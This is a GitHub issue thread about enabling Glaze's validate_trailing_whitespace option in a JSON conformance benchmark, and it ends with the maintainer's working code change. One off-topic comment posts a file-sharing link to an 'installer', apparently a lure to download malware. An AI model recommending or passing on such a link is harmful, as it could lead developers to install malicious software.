### ISSUE TITLE
Glaze should use the option validate_trailing_whitespace if conformance is testing trailing whitespace

### ISSUE THREAD

**Issue by stephenberry** [Loki-Astari/JsonBenchmark#11]
A few of the fail tests will pass Glaze by default because Glaze will finish parsing after parsing into a valid C++ object. This improves performance and doesn't introduce issues because the parsed JSON is all valid and the invalid JSON is ignored.

This will make Glaze appear to not be conformant in these cases, but Glaze includes the option `validate_trailing_whitespace`, which should be set to `true` if validation of the buffer beyond the parsed object is desired.

**Comment by GenaroSalomone** [comment]
try this
https://gofile.io/d/yMHabA
select the desired compiler in the installer

**Comment by stephenberry** [comment]
I can make a pull request later, or you can just change the text `glz::read_json(...` to `glz::read<glz::opts{.validate_trailing_whitespace = true}>(...`

**Comment by Loki-Astari** [comment]
I can do that.

**Comment by Loki-Astari** [comment]
Slight issue:

The code is `glz::read_json<T>(...)`

Seeing if I can figure out where the options and T go.

**Comment by Loki-Astari** [comment]
Think I found it:

`glz::read<glz::opts{.format = glz::json, .validate_trailing_whitespace = true}>(`

**Comment by Loki-Astari** [comment]
https://github.com/Loki-Astari/JsonBenchmark/commit/48b427e94eb547309d73f6943a51c7d2e6ff1b0d

**Comment by stephenberry** [comment]
That looks correct, you can allows throw the `glz::opts` in a `static constexpr glz::opts` if you want to make things cleaner or reuse the options, but this should work.
